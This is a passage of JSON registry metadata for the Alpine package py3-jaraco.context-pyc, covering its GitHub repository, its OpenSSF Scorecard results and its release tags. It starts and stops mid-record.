Affolter","email":"mail@fabian-affolter.ch","url":"https://github.com/fabaff","packages_count":5052,"html_url":null,"role":null,"created_at":"2026-03-03T19:24:14.099Z","updated_at":"2026-03-03T19:24:14.099Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/maintainers/fabaff/packages"}],"registry":{"name":"nixpkgs-24.11","url":"https://channels.nixos.org/nixos-24.11","ecosystem":"nixpkgs","default":false,"packages_count":121983,"maintainers_count":3777,"namespaces_count":0,"keywords_count":739,"github":"NixOS","metadata":{"funded_packages_count":3349},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.059Z","updated_at":"2026-08-24T05:04:31.033Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/namespaces"}},{"id":7605044,"name":"py3-jaraco.context-pyc","ecosystem":"alpine","description":"Precompiled Python bytecode for py3-jaraco.context","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":[],"namespace":"community","versions_count":8,"first_release_published_at":"2023-04-19T14:25:59.000Z","latest_release_published_at":"2026-04-09T14:20:16.000Z","latest_release_number":"6.1.2-r0","last_synced_at":"2026-04-09T14:31:16.538Z","created_at":"2023-04-20T00:10:13.477Z","updated_at":"2026-08-06T19:26:18.582Z","registry_url":"https://pkgs.alpinelinux.org/package/edge/community/x86_64/py3-jaraco.context-pyc","install_command":"apk add py3-jaraco.context-pyc","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"jaraco","name":"Jason R. Coombs","uuid":"308610","kind":"user","description":"","email":"jaraco@jaraco.com","website":"https://www.jaraco.com","location":"Pittsburgh, PA, USA","twitter":"jaraco","company":null,"icon_url":"https://avatars.githubusercontent.com/u/308610?u=5b3fdef94d1b0ac7392d17643eaba029f5f13bea\u0026v=4","repositories_count":233,"last_synced_at":"2026-08-06T04:39:36.850Z","metadata":{"has_sponsors_listing":true,"funding":null},"html_url":"https://github.com/jaraco","funding_links":["https://github.com/sponsors/jaraco"],"total_stars":5439,"followers":746,"following":5,"created_at":"2022-11-02T16:21:31.721Z","updated_at":"2026-08-06T04:39:37.156Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco/repositories"},"tags":[{"name":"v6.1.2","sha":"098f39c911d4504b2c718f2ff483ae24f1c4d378","kind":"tag","published_at":"2026-03-20T22:10:56.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2/manifests"},{"name":"v6.1.1","sha":"47979d7b6a55353170f61f3e54d17f5973cb8e1c","kind":"tag","published_at":"2026-03-07T15:43:22.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1/manifests"},{"name":"v6.1.0","sha":"675aaf5bfb926bdafcded1b0e08ca011d6e0f599","kind":"tag","published_at":"2026-01-13T02:49:19.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0/manifests"},{"name":"v6.0.2","sha":"1fe5de1e450556cc68d1d33198f8c7b8791af42d","kind":"tag","published_at":"2025-12-24T19:18:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2/manifests"},{"name":"v6.0.1","sha":"088151eb92eaf8801d027e126d4f7a262e422424","kind":"tag","published_at":"2024-08-20T03:35:36.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1/manifests"},{"name":"v6.0.0","sha":"d892f531d6707f46ef1981f5ca7a7309ed4d3005","kind":"tag","published_at":"2024-07-26T21:08:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0/manifests"},{"name":"v5.3.0","sha":"e0e9224b3dbe6520c986bf41820f882160dd55ab","kind":"tag","published_at":"2024-04-06T22:57:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0/manifests"},{"name":"v5.2.0","sha":"c23c888c869bfb693246f69ba512aaede5b0438b","kind":"tag","published_at":"2024-04-06T14:42:52.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"0a1e1492aef2455f60f9b4f364551f0b4926da41","kind":"tag","published_at":"2024-04-04T23:18:01.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"eb865a132d3f801335f8b46b4de2d64d4e16e4b4","kind":"tag","published_at":"2024-04-04T18:56:02.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0/manifests"},{"name":"v4.3.0","sha":"0e0ae08919b984e3c7cffdb2106e437d0d0891c8","kind":"tag","published_at":"2023-01-19T15:28:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"7e22446a66f13140c0cfc7df3f36c162f11f3b5a","kind":"tag","published_at":"2023-01-18T18:06:43.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"5bf0042ef434aa8924a771a405ae29e4c0110c1e","kind":"tag","published_at":"2022-11-19T03:06:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0/manifests"},{"name":"v4.1.2","sha":"c3a9b7393ed9479dab7b02a44242ae2b017c4933","kind":"tag","published_at":"2022-07-14T05:04:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"4d09b48ade8acc32e3453da928ad1eec5158a5a0","kind":"tag","published_at":"2021-10-31T17:18:09.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"866a1b35d416ca6855f2d068072af53cbf255cc3","kind":"tag","published_at":"2021-10-31T17:08:46.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0/manifests"},{"name":"v4.0.0","sha":"23d17bf1f04b83ef34c8cd0e67d26c2e323f5a58","kind":"tag","published_at":"2021-01-29T02:38:28.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0/manifests"},{"name":"v3.0.0","sha":"e2bb8bd3fe8b3b3ed4a50c4a9f4f1998739bf276","kind":"tag","published_at":"2020-01-10T08:35:45.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v3.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0/manifests"},{"name":"2.0","sha":"105f81a6204d3a9fbb848675d62be4ef185f36f2","kind":"tag","published_at":"2019-01-01T15:40:50.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0/manifests"},{"name":"1.8","sha":"193b5a60581b5a63c3d955e002319f114f9a7c8b","kind":"tag","published_at":"2018-11-08T16:42:27.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.8","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8/manifests"},{"name":"1.7","sha":"d7866113d8d79a541c1f87e2eae975d23d2500ba","kind":"tag","published_at":"2017-11-28T19:27:39.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.7","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7/manifests"},{"name":"1.6.1","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:32:35.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1/manifests"},{"name":"1.6","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:19:34.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6/manifests"},{"name":"1.5.2","sha":"9660d84625f7d27f47f23bd33a1e88c6c59c5384","kind":"commit","published_at":"2015-10-30T15:02:08.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2/manifests"},{"name":"1.5.1","sha":"51add8c320bb1869d339ddb5d3e0b0df5185b431","kind":"commit","published_at":"2015-10-30T15:02:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1/manifests"},{"name":"1.5","sha":"df1e66e6ff30ee0622b1eb822a4d2ba1663b4ba5","kind":"commit","published_at":"2015-10-30T13:32:37.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5/manifests"},{"name":"1.4","sha":"41a57fcc069952a9925b0ac44d66317d679b8e01","kind":"commit","published_at":"2015-10-30T12:59:05.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.4","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/ja